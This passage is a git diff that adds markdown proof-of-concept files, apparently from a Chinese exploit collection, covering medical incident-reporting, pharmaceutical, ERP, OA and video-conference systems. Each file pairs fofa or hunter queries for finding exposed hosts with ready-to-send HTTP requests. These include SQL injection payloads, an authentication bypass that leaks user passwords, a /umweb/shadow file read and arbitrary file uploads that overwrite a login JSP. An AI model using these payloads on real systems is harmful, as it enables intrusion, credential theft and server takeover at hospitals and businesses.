deflate, br +Connection: keep-alive +Cookie: JSESSIONID=E24C32CE389D5D5C83F3648A394B8A5E +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 + +{"method":"fetch","params":{"service":"membersbyid","members":["admin"]}} +``` + +![1721307770067-084b58bd-b8ea-455d-9816-b0a136ec2621.png](./img/tu4oTq5Iw6KAViO2/1721307770067-084b58bd-b8ea-455d-9816-b0a136ec2621-291163.png) + +![1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954.png](./img/tu4oTq5Iw6KAViO2/1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954-576182.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zfcngaidiyc37nzg> \ No newline at end of file diff --git a/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md b/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md new file mode 100644 index 0000000..83b60fd --- /dev/null +++ b/医疗安全(不良)事件报告系统members存在信息泄露漏洞.md 
@@ -0,0 +1,36 @@ +# 医疗安全(不良)事件报告系统members存在信息泄露漏洞 + +# 一、漏洞简介 +鱼尾巴科技专注于医疗质控,为医院提供完整医疗质量解决方案,按照国家卫健委评审标准和中国医院质量安全管理标准,研发了医院等级评审系统、医疗安全(不良)事件报告系统、不良事件管理系统等。其中旗下医疗安全(不良)事件报告系统members存在信息泄露漏洞,通过该漏洞可获取管理员明文密码进入后台。 + +# 二、影响版本 ++ 医疗安全(不良)事件报告系统 + +# 三、资产测绘 ++ fofa`body="koma.Application"` ++ 特征 + +![1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63.png](./img/jhNzbDrLMxpLCf20/1721306769436-e4a4bc7b-dc51-437f-beba-c4aff1c4db63-247254.png) + +# 四、漏洞复现 +```plain +POST /services/members HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-dctech-json-rpc +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +Priority: u=0 +Content-Length: 66 + +{"method":"fetch","params":{"service":"members","user_class":""}} +``` + +![1721307742396-a938cb64-2d51-45ff-8628-d7c7d525611b.png](./img/jhNzbDrLMxpLCf20/1721307742396-a938cb64-2d51-45ff-8628-d7c7d525611b-362515.png)![1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954.png](./img/jhNzbDrLMxpLCf20/1721306807514-42e7baa0-a868-43e4-901b-4fc15e64e954-802866.png) + + + +> 更新: 2024-10-22 09:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/svb01mcl3q5d1dwx> \ No newline at end of file diff --git a/医药公司登录系统GetLshByTj存在SQL注入漏洞.md b/医药公司登录系统GetLshByTj存在SQL注入漏洞.md new file mode 100644 index 0000000..ca8f2d1 --- /dev/null +++ b/医药公司登录系统GetLshByTj存在SQL注入漏洞.md 
@@ -0,0 +1,82 @@ +# 医药公司登录系统GetLshByTj存在SQL注入漏洞 + +# 一、漏洞简介 +医药公司登录系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式,并具备完善的客户档案管理功能,包括客户的基本信息、经营权限等。此外,系统还提供国药标准药品字典库云下载功能,便于用户快速获取药品信息。整体而言,医药公司登录系统通过自动化的管理和数据分析,帮助医药企业优化业务流程,提升市场竞争力。 + +# 二、影响版本 ++ 医药公司登录系统 + +# 三、资产测绘 ++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"` + +![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/YJr-f544KP8rikO0/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-267631.png) + +# 四、漏洞复现 +```java +POST /WebService.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +Upgrade-Insecure-Requests: 1 +Priority: u=1 +SOAPAction: http://tempuri.org/GetLshByTj +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 454 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> + <soapenv:Header/> + <soapenv:Body> + <tem:GetLshByTj> + <!--type: string--> + <tem:tjstr>gero et</tem:tjstr> + <!--type: string--> + <tem:djcname>onoras imperio';WAITFOR DELAY '0:0:5'--</tem:djcname> + <!--type: boolean--> + <tem:redonly>true</tem:redonly> + </tem:GetLshByTj> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1718692030456-63586960-4583-46f0-826d-701762b755e0.png](./img/YJr-f544KP8rikO0/1718692030456-63586960-4583-46f0-826d-701762b755e0-777595.png) + +```java +POST /WebService.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br 
+Connection: close +Cookie: _sid=tp_1700221267_fbf3ff64ee297b12 +Upgrade-Insecure-Requests: 1 +Priority: u=1 +SOAPAction: http://tempuri.org/GetLshByTj +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 478 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> + <soapenv:Header/> + <soapenv:Body> + <tem:GetLshByTj> + <!--type: string--> + <tem:tjstr>gero et</tem:tjstr> + <!--type: string--> + <tem:djcname>onoras imperio</tem:djcname> + <!--type: boolean--> + <tem:redonly>true</tem:redonly> + </tem:GetLshByTj> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1718692048095-bbd1d173-eb00-4cd1-9589-c26ed768f0fd.png](./img/YJr-f544KP8rikO0/1718692048095-bbd1d173-eb00-4cd1-9589-c26ed768f0fd-644411.png) + + + +> 更新: 2024-06-23 23:40:49 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffth09eureon16c6> \ No newline at end of file diff --git a/医药公司登录系统Login存在SQL注入漏洞.md b/医药公司登录系统Login存在SQL注入漏洞.md new file mode 100644 index 0000000..049b584 --- /dev/null +++ b/医药公司登录系统Login存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 医药公司登录系统Login存在SQL注入漏洞 + +# 一、漏洞简介 +医药公司登录系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式,并具备完善的客户档案管理功能,包括客户的基本信息、经营权限等。此外,系统还提供国药标准药品字典库云下载功能,便于用户快速获取药品信息。整体而言,医药公司登录系统通过自动化的管理和数据分析,帮助医药企业优化业务流程,提升市场竞争力。 + +# 二、影响版本 ++ 医药公司登录系统 + +# 三、资产测绘 ++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"` + +![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/Zh-OJkFeum4RXVH1/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-439620.png) + +# 四、漏洞复现 +```http +POST /Login.aspx/CheckUser HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Content-Type: application/json; charset=utf-8 +Priority: u=1 + +{"value":"' waitfor delay '0:0:5'--+"} +``` + +![1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420.png](./img/Zh-OJkFeum4RXVH1/1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420-413034.png) + + + +> 更新: 2024-06-23 23:40:49 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nttl3oy8wgueg1gq> \ No newline at end of file diff --git a/医药公司登录系统存在SQL注入漏洞.md b/医药公司登录系统存在SQL注入漏洞.md new file mode 100644 index 0000000..67c4d66 --- /dev/null +++ b/医药公司登录系统存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 医药公司登录系统存在SQL注入漏洞 + +# 一、漏洞简介 +医药公司登录系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式,并具备完善的客户档案管理功能,包括客户的基本信息、经营权限等。此外,系统还提供国药标准药品字典库云下载功能,便于用户快速获取药品信息。整体而言,医药公司登录系统通过自动化的管理和数据分析,帮助医药企业优化业务流程,提升市场竞争力。 + +# 二、影响版本 ++ 医药公司登录系统 + +# 三、资产测绘 ++ fofa`body="ResourceScripts/zh-cn-Login.aspx.js"` + +![1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a.png](./img/ozPPteBCOVE52AVP/1718300393150-bc4c042c-e623-4c35-bd2f-b019efc0686a-788714.png) + +# 四、漏洞复现 +```http +POST /Login.aspx/CheckUser HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Content-Type: application/json; charset=utf-8 +Priority: u=1 + +{"value":"' waitfor delay '0:0:5'--+"} +``` + +![1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420.png](./img/ozPPteBCOVE52AVP/1718300458322-719caf40-b4e1-4836-a62c-a0aca66ca420-062181.png) + + + +> 更新: 2024-06-17 09:24:15 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fq92t7qp61yzgzp1> \ No newline at end of file diff --git a/华为Auth-Http-Serve任意文件读取.md b/华为Auth-Http-Serve任意文件读取.md new file mode 100644 index 0000000..c18771a --- /dev/null +++ b/华为Auth-Http-Serve任意文件读取.md @@ -0,0 +1,14 @@ + +## 华为Auth-Http Serve任意文件读取 +华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器,在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等,可以实现用户身份认证、授权和审计等功能。同时,可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件 +## fofa +``` +server="Huawei Auth-Http Server 1.0" +``` + +## POC +``` +/umweb/shadow +``` + +![image](https://github.com/wy876/POC/assets/139549762/6e52e737-0076-4630-9d6f-a9f0a355b549) diff --git a/华为Auth-HttpServer1.0存在任意文件读取.md b/华为Auth-HttpServer1.0存在任意文件读取.md new file mode 100644 index 0000000..d747c46 --- /dev/null +++ b/华为Auth-HttpServer1.0存在任意文件读取.md 
@@ -0,0 +1,25 @@ +# 华为Auth-Http Server 1.0存在任意文件读取 + +# 一、漏洞简介 +华为Auth-Http Server 1.0存在任意文件读取漏洞 + +# 二、影响版本 ++ 华为Auth-Http Server 1.0 + +# 三、资产测绘 ++ fofa`server="Huawei Auth-Http Server 1.0"` ++ 特征 + +![1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e.png](./img/awN0FrlYIE9HHmOb/1699412396641-ceacb9ea-3734-4626-b088-37559c150c3e-662211.png) + +## 四、漏洞复现 +```plain +/umweb/shadow +``` + +![1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a.png](./img/awN0FrlYIE9HHmOb/1699412443472-84c1538e-472c-4434-bbe7-92c7d2f10f2a-439777.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2> \ No newline at end of file diff --git a/华夏ERPV3.3存在信息泄漏漏洞.md b/华夏ERPV3.3存在信息泄漏漏洞.md new file mode 100644 index 0000000..45cb508 --- /dev/null +++ b/华夏ERPV3.3存在信息泄漏漏洞.md @@ -0,0 +1,24 @@ +# 华夏ERPV3.3存在信息泄漏漏洞 + +华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。 + +## hunter + +```yaml +web.icon=="f6efcd53ba2b07d67ab993073c238a11" +``` + +## poc + +```java +GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/c12Frd6hp0a3r8A9-lVr-g \ No newline at end of file diff --git a/华夏ERPgetAllList存在信息泄露漏洞.md b/华夏ERPgetAllList存在信息泄露漏洞.md new file mode 100644 index 0000000..e7f196e --- /dev/null +++ b/华夏ERPgetAllList存在信息泄露漏洞.md 
@@ -0,0 +1,37 @@ +# 华夏ERP getAllList存在信息泄露漏洞 + +# 一、漏洞简介 +jshERP立志为中小企业提供开源好用的ERP软件,降低企业的信息化成本,目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面,精确到每个按钮和菜单。该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。 + +# 二、影响版本 ++ jshERP + +# 三、资产测绘 ++ Hunter`web.body="jshERP"` ++ 特征 + +![1704276326167-84de47c7-5c90-4441-9814-5a3cbf02f2f6.png](./img/taahvRvbAHDcrLXX/1704276326167-84de47c7-5c90-4441-9814-5a3cbf02f2f6-359942.png) + +# 四、漏洞复现 +```plain +GET /jshERP-boot/user/getAllList;.ico HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1704276087; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1704276315 +Upgrade-Insecure-Requests: 1 +``` + +![1704276423442-010d25cc-0516-4888-985c-fc04aa5c1904.png](./img/taahvRvbAHDcrLXX/1704276423442-010d25cc-0516-4888-985c-fc04aa5c1904-335255.png) + +解密即可登录 + +![1704276460771-27d3c0fa-c153-490e-8592-0e2c6390e581.png](./img/taahvRvbAHDcrLXX/1704276460771-27d3c0fa-c153-490e-8592-0e2c6390e581-927135.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/grwzu7s9grkulo1a> \ No newline at end of file diff --git a/华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964).md b/华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964).md new file mode 100644 index 0000000..31c2556 --- /dev/null +++ b/华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964).md 
@@ -0,0 +1,33 @@ +# 华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964) + +# 一、漏洞简介 +华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ 华夏ERP + +# 三、资产测绘 ++ hunter`web.body="jshERP-boot"` ++ 登录页面 + +![1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4.png](./img/okq7OrqZU_vpgIqS/1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4-288811.png) + +# 四、漏洞复现 +```java +GET /jshERP-boot/user/getAllList;.ico HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1693579975; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1693580257 +Upgrade-Insecure-Requests: 1 +``` + +![1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636.png](./img/okq7OrqZU_vpgIqS/1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636-684436.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wtdceob1qqhc24yg> \ No newline at end of file diff --git a/华夏通讯录存在前台upload任意文件上传.md b/华夏通讯录存在前台upload任意文件上传.md new file mode 100644 index 0000000..dee570c --- /dev/null +++ b/华夏通讯录存在前台upload任意文件上传.md 
@@ -0,0 +1,32 @@ +# 华夏通讯录存在前台upload任意文件上传 + +华夏通讯录存在前台由于在鉴权方面存在疏漏,导致了可未授权访问,从而通过/admin/common/upload接口进行任意文件上传。 + +## fofa + +```javascript +icon_hash="1403225079" && ":) APPV1" +``` + +## poc + +```javascript +POST /admin/common/upload HTTP/2 +Host: 127.0.0.1 +Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Length: 218 + +-----------------------------289666258334735365651210512949 +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/png + +1111 +-----------------------------289666258334735365651210512949-- +``` +路径返回包中 +![image](https://github.com/user-attachments/assets/96615f38-3cf9-44d9-ba76-85fae0f45b31) + diff --git a/华天动力OA系统upload.jsp任意文件上传漏洞.md b/华天动力OA系统upload.jsp任意文件上传漏洞.md new file mode 100644 index 0000000..32d9c17 --- /dev/null +++ b/华天动力OA系统upload.jsp任意文件上传漏洞.md 
@@ -0,0 +1,59 @@ +# 华天动力OA系统upload.jsp任意文件上传漏洞 + +华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,控制服务器权限,读取敏感信息等。 + +## fofa + +```yaml +body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app" +``` + +## poc + +获取绝对路径 + +```java +POST /OAapp/jsp/upload.jsp HTTP/1.1 +Host: x.x.x.x:xx +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 293 + +------WebKitFormBoundary5Ur8laykKAWws2QO +Content-Disposition: form-data; name="file"; filename="xxx.xml" +Content-Type: image/png + +real path +------WebKitFormBoundary5Ur8laykKAWws2QO +Content-Disposition: form-data; name="filename" + +xxx.png +------WebKitFormBoundary5Ur8laykKAWws2QO-- +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281028921.webp) + +将“123”写入到normalLoginPageForOther.jsp文件中去 + +```javascript +POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1 +Host: x.x.x.x:xx +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 389 + +------WebKitFormBoundaryzRSYXfFlXqk6btQm +Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt" +Content-Type: image/png + +<%out.print("123");%> +------WebKitFormBoundaryzRSYXfFlXqk6btQm +Content-Disposition: form-data; name="newFileName" + +D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp +------WebKitFormBoundaryzRSYXfFlXqk6btQm-- +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281029565.webp) + 
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281029962.webp) diff --git a/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md b/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md new file mode 100644 index 0000000..3dbdefc --- /dev/null +++ b/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞 + +华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```kotlin +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /ajax/checkDoubleUserNameForAdd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +userName=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+' +``` + diff --git a/华望云会议管理平台conflog.inc存在SQL注入漏洞.md b/华望云会议管理平台conflog.inc存在SQL注入漏洞.md new file mode 100644 index 0000000..dcf886b --- /dev/null +++ b/华望云会议管理平台conflog.inc存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 华望云会议管理平台conflog.inc存在SQL注入漏洞 + +华望云会议管理平台 `conflog.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/conflog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId&selectTime=1 HTTP/1.1 +Host: +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +X-Requested-With: XMLHttpRequest +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +``` + 
diff --git a/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md b/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md new file mode 100644 index 0000000..30f0a3e --- /dev/null +++ b/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 华望云会议管理平台confmanger.inc存在SQL注入漏洞 + +华望云会议管理平台 `confmanger.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/confmanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId¶ms[]=displayName HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: */* +``` + diff --git a/华望云会议管理平台deptactionlist存在SQL注入漏洞.md b/华望云会议管理平台deptactionlist存在SQL注入漏洞.md new file mode 100644 index 0000000..0d0c8f0 --- /dev/null +++ b/华望云会议管理平台deptactionlist存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 华望云会议管理平台deptactionlist存在SQL注入漏洞 + +华望云会议管理平台 `deptactionlist` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/deptactionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1¶ms[]=dpName¶ms[]=dpId HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +``` + +![6c237de2647241b88da8985fa11e6dff.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132246419.png) \ No newline at end of file diff --git a/华望云会议管理平台myconflist.in存在SQL注入漏洞.md b/华望云会议管理平台myconflist.in存在SQL注入漏洞.md new file mode 100644 index 0000000..caf0edd --- /dev/null +++ b/华望云会议管理平台myconflist.in存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 华望云会议管理平台myconflist.in存在SQL注入漏洞 + +华望云会议管理平台 `myconflist.in` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +GET /page/myconflist.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=confName¶ms[]=confId&selectTime=1 HTTP/1.1 +Host: +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +X-Requested-With: XMLHttpRequest +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Cookie: uid=112; 获取到的cookie languageGlobal=1 +``` + +![ed5c1a12018c4e1a862263ac386838f5.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132247707.png) \ No newline at end of file 
diff --git a/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md b/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md new file mode 100644 index 0000000..bfb25f3 --- /dev/null +++ b/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 华望云会议管理平台recodemanger.inc存在SQL注入漏洞 + +华望云会议管理平台 `recodemanger.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/recodemanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=nName¶ms[]=confName¶ms[]=displayName¶ms[]=status&selectTime=1 HTTP/1.1 +Host: +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: 